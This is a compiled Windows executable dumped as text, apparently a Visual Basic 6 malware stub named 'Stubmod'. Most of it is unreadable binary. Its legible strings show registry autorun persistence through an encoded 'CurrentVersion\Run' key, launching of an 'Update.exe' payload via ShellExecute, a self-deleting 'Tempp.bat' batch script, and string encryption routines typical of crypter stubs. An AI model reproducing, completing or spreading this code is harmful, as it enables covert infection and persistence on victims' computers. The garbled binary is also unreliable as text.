MZ�       ��  �       @                                   �   � �	�!�L�!This program cannot be run in DOS mode.
$       m�)zi�)zi�)zi�-Yd�(zi�Rich)zi�                PE  L &�F        �   @          4      P    @                     p      �                                K  (    `  �                                                                            |                           .text    <      @                    `.data   �   P                      @  �.rsrc   �   `      P              @  @��:@           MSVBVM60.DLL                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    {efdjf��f��f��f~�f�jf�df&rf�dfhrftf�Xf� f��f�<f[rf�sff]�f�f��f�Jf�Zf/�f|5 f^bfqbfucf�-f        �%4@ �%(@ �%$@ �%@@ �%t@ �%X@ �%\@ �%@ �%,@ �%`@ �%@ �% @ �%0@ �%8@ �%@ �%H@ �%D@ �%P@ �%@ �%@ �%h@ �%@ �% @ �%T@ �%@ �%l@ �%p@ �%<@ �%L@ �%d@ h@ �����      0   8       ��с�iG�FQL�         ValueEStub ey,       �!@    D!@    � @    � @    h @    4 @    �@    �@    ,@    �@    l@     @    �@    x@     @    �@    �@ VB5!#*             ~             
 	      �@ �@  �0  ���          �   |@ |@ @@ x   �   �   �                   Stubmod Stub  Stub    4@     ��������    �@ @P@    �@ 
       2# �@ �T@ p@ `@ �@ �@ �@ �@ D@ �@ 8@ \ W I N D O W S \ s y s t e �-@ +@ �)@ )@ ��-@ �(@ ��+@ �(@ �Ậ)@ �(@ ��)@ �(@ ��   4@     ��������    �@  P@    �@ B �     T\$ �@ @ �@ �@ @ $@ �@ 4@ �@ <@ �@ �@ D@ L@ �T@ p@ `@ �@ @@ �@ �@ �@ �@ �@ �@ �@ �@ �@ @ �@ �@ �@ �!@ 4@ �@  #@ 4#@ �@ (@ �@ H#@ �@ d#@ �#@ �#@ �#@ �#@ �#@ �#@ �@ �#@ �@ $@ $@ $@ $@ ,$@ �@ �@ �@ 4$@ �@ 8@ �@ �@ <$@ �@                             pJ@ �>@ �2@ �+@ x1@ d0@ T/@ �pJ@ �(@ �Ấ>@ �(@ �Ẕ2@ �(@ ���+@ �(@ ��x1@ �(@ ��d0@ �(@ ��T/@ �(@ ��  4@     ��������    �@ PP@    @ - @     ,f P@ �@ L @ �@ �$@ �@ �$@ � @ \!@ �$@ �@ �@ @ �@ !@ �$@ �$@  %@ L%@ h%@ �%@ �%@ �%@ ,&@ L&@ p&@ �&@ l$@ �&@ �&@ '@ �'@ 
@ @ @ D@ �'@ @ �'@ �@ �@ �@ � @ �@ (@ @(@ V i s u a l   S t u d i o \ C o m m D5@ �<@ �@@ �D@ t.@ �,@ �6@ �B@ 8;@ d*@ $8@ �3@ �9@ �D5@ �(@ ���<@ �(@ �ẜ@@ �(@ ���D@ �(@ ��t.@ �(@ ���,@ �(@ �Ẵ6@ �(@ �ẤB@ �(@ ��8;@ �(@ ��d*@ �(@ ��$8@ �(@ ���3@ �(@ �Ẩ9@ �(@ ���  4@      K@ K@ �   P@ "@                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     |@        �P@ |(@ ����    �P@ �a5��fN��g�� ��
    �@             4@ 	  	         L@ �����@     P@     @        ��  �     �@ ����@     HP@      @        ��  �     @ ����x!@     XP@     (@        ��  �     start   Module1 modRegistry Stub       U � U �        � U � U     	   advapi32       RegOpenKeyExA   `@ p@    �S@         �T@ �t��h�@ ��@ ����      advapi32.dll       RegSetValueExA  �@ �@    T@         �T@ �t��h�@ ��@ ����      RegCloseKey `@ @    T@         �T@ �t��h @ ��@ ����      SHELL32.DLL    ShellExecuteA   X@ h@     T@         �(T@ �t��hx@ ��@ ����   	   KERNEL32       GetTempPathA    �@ �@    ,T@         �4T@ �t��h�@ ��@ ����      GetWindowsDirectoryA    �@ @    8T@         �@T@ �t��h @ ��@ ����      GetSystemDirectoryA �@ X@    DT@         �LT@ �t��hl@ ��@ ����   ( 8                $  (  ,  0     GetModuleFileNameA  �@ �@    PT@         �XT@ �t��h�@ ��@ ����      GetShortPathNameA   �@ @    \T@         �dT@ �t��h,@ ��@ ����      GetPrivateProfileStringA    �@ d@    hT@         �pT@ �t��h�@ ��@ ����      WritePrivateProfileStringA  �@ �@    tT@         �|T@ �t��h�@ ��@ ����                < � >      < / � >        �      |      \      1   #=����h�8 +3q�"=����h�8 +3q�   P@ `@     yO�3�f�� � `ӓ   U p d a t e . e x e        O p e n                Y E S   P  2 8 3 3 1 1 1 3 1 0 2 3 1 1 6 3 1 1 9 2 9 7 3 1 1 4 3 1 0 1 2 9 2 2 7 7 3 1 0 5 2 9 9 3 1 1 4 3 1 1 1 3 1 1 5 3 1 1 1 3 1 0 2 3 1 1 6 2 9 2 2 8 7 3 1 0 5 3 1 1 0 3 1 0 0 3 1 1 1 3 1 1 9 3 1 1 5 2 9 2 2 6 7 3 1 1 7 3 1 1 4 3 1 1 4 3 1 0 1 3 1 1 0 3 1 1 6 2 8 6 3 1 0 1 3 1 1 4 3 1 1 5 3 1 0 5 3 1 1 1 3 1 1 0 2 9 2 2 8 2 3 1 1 7 3 1 1 0            �@ p@    �T@         ��T@ �t��h4 @ ��@ ����   �@ @    �T@         ��T@ �t��hh @ ��@ ����      RegCreateKeyA   �@ � @    �T@         ��T@ �t��h� @ ��@ ����      RegDeleteKeyA   �@ � @    �T@         ��T@ �t��h� @ ��@ ����      RegQueryValueExA    �@ 0!@    �T@         ��T@ �t��hD!@ ��@ ����   , H               $   ,  @     P@ �T@ l  2 8 3 3 1 1 1 3 1 0 2 3 1 1 6 3 1 1 9 2 9 7 3 1 1 4 3 1 0 1 2 9 2 2 7 7 3 1 0 5 2 9 9 3 1 1 4 3 1 1 1 3 1 1 5 3 1 1 1 3 1 0 2 3 1 1 6 2 9 2 2 8 7 3 1 0 5 3 1 1 0 3 1 0 0 3 1 1 1 3 1 1 9 3 1 1 5 2 9 2 2 6 7 3 1 1 7 3 1 1 4 3 1 1 4 3 1 0 1 3 1 1 0 3 1 1 6 2 8 6 3 1 0 1 3 1 1 4 3 1 1 5 3 1 0 5 3 1 1 1 3 1 1 0 2 9 2 2 8 2 3 1 1 7 3 1 1 0 2 7 9 3 1 1 0 2 9 9 3 1 0 1     �fĤ�I�x � 8<�       VBA6.DLL       \ t e m p p . b a t        \ T e m p p . b a t        @ E C H O   O F F       �    : M        d e l          I F   E X I S T          G O T O   M      u p d a t e . e x e        s      w      t   
   \ t e m p      a          *   e r r o r :   i n v a l i d   l e n g t h      C a n ' t   W r i t e   K e y          M E S S A G E |     S e n d D a t a     
   E r r o r   "   H K E Y _ C L A S S E S _ R O O T   "   H K E Y _ C U R R E N T _ U S E R   $   H K E Y _ L O C A L _ M A C H I N E        H K E Y _ U S E R S     *   H K E Y _ P E R F O R M A N C E _ D A T A   &   H K E Y _ C U R R E N T _ C O N F I G      H K E Y _ D Y N _ D A T A   B   T h e   R e g i s t r y   D a t a b a s e   i s   c o r r u p t !      B a d   K e y   N a m e        C a n ' t   O p e n   K e y        C a n ' t   R e a d   K e y     8   A c c e s s   t o   t h i s   k e y   i s   d e n i e d        O u t   o f   m e m o r y   "   I n v a l i d   P a r a m e t e r   |   T h e r e   i s   m o r e   d a t a   t h a n   t h e   b u f f e r   h a s   b e e n   a l l o c a t e d   t o   h o l d .     .   U n d e f i n e d   E r r o r   C o d e :       
   H K E Y _   "   I n c o r r e c t   F o r m a t :   .   E r r o r   e n c r y p t i n g   s t r i n g   .   E r r o r   d e c r y p t i n g   s t r i n g   ������������    4@ ����    p(@             ����    lt�Jlt�l�4ll�^	  qd�<ll�h��Xlh�lt�G  ld��pr�2 l�h�kr��lt�Cl�ll�  1h�ll�lt�G  >h�1x�/l�t �@   ` 4                    x� t� : \  r           l� h� lt�Jlt�l�4ll�^  qd�<ll�h��Xlh�lt�G  ld��pr�2 l�h�kr��lt�Cl�ll�  1h�ll�lt�G  >h�1x�/l�= �@   ` 4                    x� t� n g  \           l� h�  4 l 
   � 4 �Rk  0 � h�4lh�� 4 ^)  qd�<lh�l �Xld�� $ /h�� $ �    �k � 0 ^  qd�<ld�� $ ��  @   p (                     l�           h� � J�   �qp�(L�  lp�<�
  <�`1t�6 L�<�lp�lt�4�4l4�� 8�4l8�^  q0�<l8�l �Xl4�t��Xl0�ql�2 8�4�ll�lt�  1x� �@  L x ,                     x� t�           8� 4� L� <�   K�� � ����]   5�^  q8��    L�
8  L�l8�<�
9  <�`1p�6 L�<� �p��    �u ��z��� ����z� �ll�z��   �x 
    ��=    L@  D � ,                      t� p�           L� <� � Ct�lt� �0 �   �qx�� lt� �02 �  �qx�� lt� �0H �  �qx�� lt� �0^ �  �qx�� lt� �0t �  �qx�� lt� �0� �  �qx�� lt� �0� �  �qx���@   � (                      t�              K�� Vh�l�  $   l�  lt�Jlt�d�4ld�lh�^  q\�<ld�`��Xl`�lt�G  l\�qp�2 d�`�l� (lp�lt�Cd�ld�  1`�ld�lt�G  >`�1x�/d�  �@    � 4                    x� t�                  d� `� l�  4 l 
   � 4 �R�  0 �  �    � h�4lh�� 4 ^  qd�<lh�l �Xld�� $ /h�� $ �    �� � h�4lh�� 0 ^  qd�<lh�l �Xld�� $ /h�� 0 ^  qd�<ld�� $ �� @   � (                     l�           h�   K�� �~pp� �0pn� 
>   �jL�
?  5L�  ��;  @ Cx�  �r� �cH��  F'L�
A  s�lt�F(�kp�kn�����n��kn�����8�
8  8����`1t�6 L�8�� 
r�dH�M  lt�Cx�  L@  h � ,                     x� t�           L� 8� �  l Cx�l Ct�l Cp� K�� 6l��  �    lp�`�4l`�l ^:  q\�<l`�p��Xl\�qd�/`� ld��    �`    lt�; *1h� Mlh�Jlh�X�4lX��   �    lx�`�4l`�ll�^<  q\�<l`�x��XlX�h��Xl\�qd�2 `�X� ll�
=  <   i L@  $ � 4                      x� h� t� p�           `� X�  l Cx�l Ct�l Cp� K�� 6l��  �    lp�`�4l`�l ^:  q\�<l`�p��Xl\�qd�/`� ld��    �`    lt�; *1h� Mlh�Jlh�X�4lX��   �    lx�`�4l`�ll�^<  q\�<l`�x��XlX�h��Xl\�qd�2 `�X� ll�
=  <     L@  $ � 4                      x� h� t� p�           `� X�   K�� �  d�
  d�`1t�5d� �l MT�@d�
2  d���D� D�:T�3 ]�3V  
    1x��  D�:T�4 ]�3s  
   1x��  D�:T�5 ]�3�     #@�6 *1x�/@��  D�:T�7 ]�3�  $@�<� $   <�P  >@�1x�<�    L@  @ � 0                     x� D� t�           @� <� d� K� ( Cx��r�� J��cn�s (<� kr��l M\�@,�
*  ,���(�  ��1t�/(�6 <�,�lx�lt�J��#(�*#$�lt�*1x�2 (�$�r�dn�  � lx��1 ( Cx��r�� J��c �� lx�F��(<� kr��l M\�@,�
*  ,�(�� �� ��"��
&  ������`1x�6
 <�,� �����r�d �� + Cx� @  � � ,                      x� t� (          (� $� <� ,�  � �� ��  4 l 
   � 4 �R 0 �  �    � h�4lh�� 4 ^  qd�<lh�l �Xld�� $ /h�� $ �    �� �   l �   �    � h�4lh�� 0 ^  qd�<lh�l �Xld�� $ /h�� $ �    ��� ���   $   #h�*FD�%T�����  /h�5D�� 0 ^  qd�<ld�� $ ��  $   #h�*FD�%T�����  /h�5D��� O @  H  ,                     l� T�           h� D� � qd�ld���  � ld���  �* :T� � h�,ld��   �B ld���  �N :T� � h�,ld���  �f :T� � h�,ld��   �~ ld���  �� :T� � h�,ld��   �� :T� � h�,ld���  �� :T� � h�,ld��   �� ld��   �� :T� � h�,ld��W   �� :T� � h�,ld���   �:T� � h�, l MT�@  #P�*F@���h�/P�   @  < 0,                     x� h�           P� @�  4 l 
   � 4 �R, 0 �  �    � h�4lh�� 4 ^  qd�<lh�l �Xld�� $ /h�� $ �    �� J� `�4l`��   �    � h�4lh�� 0 ^  qd�<lh�l �Xl`�l �Xld�� $ 2 h�`�� $ �    ��� ���   $   #h�*F@�%P�����  /h�5@�� 0 ^  qd�<ld�� $ ,��,  $   #h�*F@�%P�����  /h�5@��� @  L 0,                     l� P�           h� `� @� K8 r � Cx�( �1 �j�lx�J��cf�r � (4� kj��x�MT�@$�
*  $��� �  � ���#�*�' 2  ��6 4�$�j�df�& ( Cx��   l MT�@4�
!  4�Upr�54�'4��   l MT�@$�
*  $�`�' 6 4�$�kr��l MT�@4�
!  4�`1t�54�'4�lt�J�   �l MT�@$�
*  $�`�' 6 4�$�lx�FT�lt�P4�
&  4���$�`1x�6 4�$�� ( �=x , Cx� @  ` @0                      x� l� t�            � � 4� $� �   � " �    ��� $ �   l Ml�@\�
!  \�:L�# ]�<<��   l M,�@�
$  �:�" ]�/������6 \��� :,� :l�% �
   \�
&  \���<��
   �
&  ������ FL���������%������  6 \�<��������C� $ �    �� l ^'  � ( �1 C� $ �   �l Ml�@\�
!  \�`����^'  � /��5\�� J� $ �l Ml�@\�
$  \�`�' 5\�@  � D(                      �� (          �� \� <� � �� �� ��  4 l 
   � 4 �RM 0 �  �    � h�4lh�� 4 ^  qd�<lh�l �Xld�� $ /h�� $ �    ��   Y`� ( �   Yd��    � h�4lh�� 0 ^  q\�<lh�l �Xl\�� $ /h�� $ �    �� � 0 ^  qd�<ld�� $ � ( �iL���l�:L� � l���'��'�',��     $   F<�
	  6 <�,����M:L� � l���M'��'�',��     $   F<�
	  6 <�,������ ���@  � T(                     l�            h� <� ,� � ��       ��t�%  1x�/t� �d   &  1p� K��    #t�' *FX�
(  /t�5X�     #t�) *#D�����] 2 t�D� * ��+   , ��+   - lx�*#t���+  /t� ". lx�*#t�/ *#D���+  2 t�D� 1   1<�- ><�#t�*#D�) *#@���+  2 t�D�@�<� ��= .   1D��    >D�#t�' *FX�
0  t4�2 t�D�5X� 
    Q   10��   �    �    >0�#t� *#D�1 *#@�<�4l<��    �    
  <2
 t�D�@�<�0� ��   L@  L �8                      h�      x� p�   $          t� D� @� <� 0� X�  4 l 
   � 4 �R� 0 �  �    � X�4lX�� 4 ^  qT�<lX�l �XlT�� $ /X�� $ �    �m� J� < �    � <  @ ��   � ($� \�� < �i4��h�� (�� \��"� 
  #X�  �\��"� @ ��/X�5��\��~�� � < �   � @ .��@�   �    � X�4lX�� 0 ^  qT�<lX�l �X-��lT�� $ /X�� $ �    ��T��T  $   #X�*F��%������  /X�5��� 0 ^  qT�<lT�� $ ����  $   #X�*F��%������  /X�5���� @  � �8                      l� � � \� ��           �� X� ��  4 l 
   � 4 �R� 0 �  �    � h�4lh�� 4 ^  qd�<lh�l �Xld�� $ /h�� $ �    �}��   T�
  T�`�� , 5T�� , J� 8  8 � , P�4lP��   Yd��    � h�4lh�� 0 ^  qL�<lh�l �XlP� , �XlL�� $ 2 h�P�� $ �    �F� 0 ^  qd�<ld�� $  , M<�@T�
   T�`�� , 5T�� , J�   � , M<�@T�
!  T���l�z:<� � l���z  $   #h�*FT�%,�����  /h�5T��:<� � l����  $   #h�*FT�%,�����  /h�5T���  22@  P �,                     l� ,�           h� P� T�  4 l 
   � 4 �R� 0 �  �    � h�4lh�� 4 ^  qd�<lh�l �Xld�� $ /h�� $ �    ���   � 8  8 � ��#`�\�4l\��   Yd��    � h�4lh�� 0 ^  qX�<lh�l �XlX�� $ 2 h�`�\�� 8 H�
  H�`�� , 5H� 8 � , `�4l`��   Yd��    � h�4lh�� 0 ^  qX�<lh�l �Xl`� , �XlX�� $ 2 h�`�� $ �    �^� 0 ^  qd�<ld�� $ � , F8�� l��:8� � l����'��'�'(��     $   FH�
	  6 H�(�����:8� � l����'��'�'(��     $   FH�
	  6 H�(������  @  � �(                     l� (          h� `� \� H� (� � �� K�    1x�lx�����]  �^  4�
  4�`1l�54��l��    �u��=�   ll� �    ��q`��   ll� �    ��q\�l`��    �l\��    ���l\�l`���   ��i4�l`��   �l�MD�@�
  �`1l�6 4���    �����:D� N4�4�ll��
  ��6 Y�h��6 4���gD�`1l�lx�����]  �^  4�
  4�`1p�54��p��    �u��=�    �����:D� N4�4��    lh���
  ��6 Y�d��6 4���   ld��
	  �qT��   X�lh�����   ��d���    �����:D� N4�4�lX�lh���
  ��6 Y�d��6 4���   ld�.�@
  1 �-�l � *#���    ld��*1t�2  ����   ld��
	  �k4�lT��   �p�MD�@�
  �`1l�6 4���   ld�� �0 ��� $   ��P  l �   #���=�2  ������    1��   # � *#�� *#��>��#��
  2
  ���������
   lt�����] �l��    �w��=
   �   ld���3���R ��� $   ��P  �   l ���4l�� ��4l��lt���4l�� ��4l���    
  <l��t��X2
 ������ ������   ld��F$�]:D� N4�4��
  ��36 4����+��  1��� +�� C � �  #���    ld��>��#���  �
  2  ��������+��  1��� +�� C � �  #���    ld��>��#���  �
  2  �������    # � *#���    ld��*#��lt�
  2  ������+��  1��� +�� C � �  #���    ld��>��#���  �
  2  ��������+��  1��� +�� C � �  #���    ld��>��#���  �
  2  ���������   ld��
	  t��lT��o����qT�X�f��'��'��'��    �!   ���� " l���# �# *#����!   ����, " l��*F4�
$  2  �����) ����6 4������  L@  � `H            0          h�     d��   x� t� p� l� <          �  � �� �� �� �� �� �� 4� � �� �� ���������������������������̞���<K  ���������K                          � �Q �R �S �V � �w � �x � � � ��K  X ��K  � �_ �` ��K   � �: �@ �� �d  �h �i �k �E �    MSVBVM60.DLL    DllFunctionCall   __vbaExceptHandler    ProcCallEngine                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      &�F�        X  �   @  �   (  �    &�F�        �  �    &�F�        �  �    &�F�     1u  �  �2u  �  �3u  �  �    &�F�     	  �       &�F�               &�F�               &�F�         (      &�F�         8  Pa    �      lc  0   �      �c  (  �      �d  �  �      �g  0  �              4   V S _ V E R S I O N _ I N F O     ���                                           D     V a r F i l e I n f o     $    T r a n s l a t i o n     	�|   S t r i n g F i l e I n f o   X   0 4 0 9 0 4 B 0   H &  C o m p a n y N a m e     C M 2 - B 1   P r o d u c t i o n s     , 
  P r o d u c t N a m e     S t u b     , 
  F i l e V e r s i o n     1 . 0 0     0 
  P r o d u c t V e r s i o n   1 . 0 0     0   I n t e r n a l N a m e   S t u b m o d   @   O r i g i n a l F i l e n a m e   S t u b m o d . e x e            0  1u     �  2u   (  3u(                �                         �  �   �� �   � � ��  ��� ���   �  �   �� �   � � ��  ���                             �w   ���wp ����p  ����   ����   ���    � �    ��    �                                     ��  ��  ��  �  �  �  �  �  �  �  �  �  ��  ��  ��  ��  (       @         �                        �  �   �� �   � � ��  ��� ���   �  �   �� �   � � ��  ���                                                                                                          ��p          ����wp      ������wwp    ��������wp     ��������p      ��������        ��������        ��������        ��������        ��������        ��������        ��������        ��������        ������          ����  ��        ��  ��            ��            ��                                                                                                                                           �������������������������� �� �  �  �  � �� �� �� �� �� �� �� �� �� �� �� ?�����?������������������������������(       @                                ��� ��������������������������<����?���������������������������������������������=������<?������?�������������������������������������������������������� �� �  �  �  � �� �� �� �� �� �� �� �� �� �� �� ?�����?������������������������������                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    